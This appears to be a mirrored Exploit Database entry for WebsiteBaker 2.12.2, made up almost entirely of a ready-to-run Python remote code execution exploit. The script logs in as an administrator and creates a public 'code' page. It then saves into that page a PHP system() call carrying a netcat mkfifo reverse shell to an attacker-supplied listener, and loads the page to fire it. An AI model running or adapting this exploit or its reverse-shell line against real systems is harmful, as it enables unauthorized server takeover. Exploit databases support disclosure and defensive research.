WebsiteBaker 2.12.2 – Remote Code Execution

• Exploit Database
• 57 阅读

• 作者： Enesdex
  日期： 2020-09-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48838/

• # Exploit Title: WebsiteBaker 2.12.2 - Remote Code Execution
  # Date: 2020-07-04
  # Exploit Author: Selim Enes 'Enesdex' Karaduman
  # Vendor Homepage: https://websitebaker.org/pages/en/home.php
  # Software Link: https://wiki.websitebaker.org/doku.php/downloads
  # Version: 2.12.2
  # Tested on: Windows 10 and Ubuntu 18.04 
  # Note : You start listener before execute (e.g netcat) then procide listener ip and port
  
  import requests
  import re
  from bs4 import BeautifulSoup
  import sys
  import getopt
  
  options, remainder = getopt.gnu_getopt(sys.argv[1:], 'ht:u:p:i:l:',['lhost=','lport='])
  
  for opt, arg in options:
  if opt in ('-h'): 
  print('Usage: python exploit.py -t TARGET_URL -u USERNAME -p PASSWORD --lhost LISTENER_IP --lport LISTENER_PORT')
  exit()
  elif opt in ('-t'):
  main_url = arg
  elif opt in ('-u'):
  usr = arg
  elif opt in ('-p'):
  passwd = arg
  elif opt in ('-i', '--lhost'):
  	lhost = arg
  elif opt in ('-l' , '--lport'):
  	lport = arg
  
  reverse_shell_code = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc"+" "+lhost+" "+lport +" "+">/tmp/f"
  shell_code_eval = "echo system('"+ reverse_shell_code + "');"
  
  
  print("Exploit Author: Selim Enes 'Enesdex' Karaduman" + " " + "@enesdex" + "\n")
  ##LOGIN PAGE HTML PARSE FOR LOGIN PARAMS
  url = main_url+"/admin/login/index.php"
  req = requests.get(url)
  
  login_page = req.text
  soup = BeautifulSoup(login_page, 'html.parser')
  username_par = soup.find_all(attrs={"type" : "hidden"})[1]['value']
  password_par = soup.find_all(attrs={"type" : "hidden"})[2]['value']
  weird_par = soup.find_all(attrs={"type" : "hidden"})[3]['name']
  weird_val = soup.find_all(attrs={"type" : "hidden"})[3]['value']
  
  #LOGIN TO GET SESSIoN_COOKIE
  login_page = requests.Session()
  
  burp0_url = main_url+"/admin/login/index.php"
  burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
  burp0_data = {"url": '', "username_fieldname": username_par, "password_fieldname": password_par, weird_par : weird_val, username_par : usr,password_par : passwd, "submit": ''}
  r = login_page.post(burp0_url, headers=burp0_headers, data=burp0_data,allow_redirects = False)
  
  cok = r.headers['Set-Cookie']
  cok = cok.split(' ')[0]
  cookie_par = cok.split('=')[0]
  cookie_val = cok.split('=')[1].replace(';','')
  session_cookie = cookie_par + "=" + cookie_val
  
  
  ##ADD PAGE HTML PARSE FOR CREATE PAGE PARAMS
  url = main_url+"/admin/pages/index.php"
  cookies = {cookie_par : cookie_val}
  req = requests.get(url, cookies=cookies)
  create_page = req.text
  soup = BeautifulSoup(create_page, 'html.parser')
  weird_par1 = soup.find_all(attrs={"type" : "hidden"})[0]['name']
  weird_val1 = soup.find_all(attrs={"type" : "hidden"})[0]['value']
  
  ##Create Code Page to Put Shell Code
  create_page = requests.session()
  
  burp0_url = main_url+"/admin/pages/add.php"
  burp0_cookies = {cookie_par : cookie_val}
  burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
  burp0_data = {weird_par1: weird_val1, "title": "exploit-shell", "type": "code", "parent": "0", "visibility": "public", "submit": "Add"}
  c = create_page.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
  
  ##FIND THE PAGE ID
  url = main_url+"/admin/pages/index.php"
  cookies = {cookie_par : cookie_val}
  req = requests.get(url, cookies=cookies)
  find_id = req.text
  soup = BeautifulSoup(find_id, 'html.parser')
  pageid = soup.find_all('option',string='exploit-shell')[0]['value']
  
  ##HTML PARSE TO PUT SHELL CODE
  url = main_url+'/admin/pages/modify.php?page_id='+pageid
  cookies = {cookie_par : cookie_val}
  req = requests.get(url, cookies=cookies)
  add_shellcode = req.text
  soup = BeautifulSoup(add_shellcode, 'html.parser')
  weird_par2 = soup.find_all(attrs={"type" : "hidden"})[3]['name']
  weird_val2 = soup.find_all(attrs={"type" : "hidden"})[3]['value']
  
  ##ADD SHELL CODE
  session = requests.session()
  
  burp0_url = main_url+"/modules/code/save.php"
  burp0_cookies = {cookie_par : cookie_val}
  burp0_headers = {"Content-Type": "application/x-www-form-urlencoded"}
  burp0_data = {"page_id": pageid, "section_id": pageid, weird_par2: weird_val2, "content": shell_code_eval}
  a = session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
  
  last_req = requests.get(main_url+"/pages/exploit-shell.php", cookies=cookies)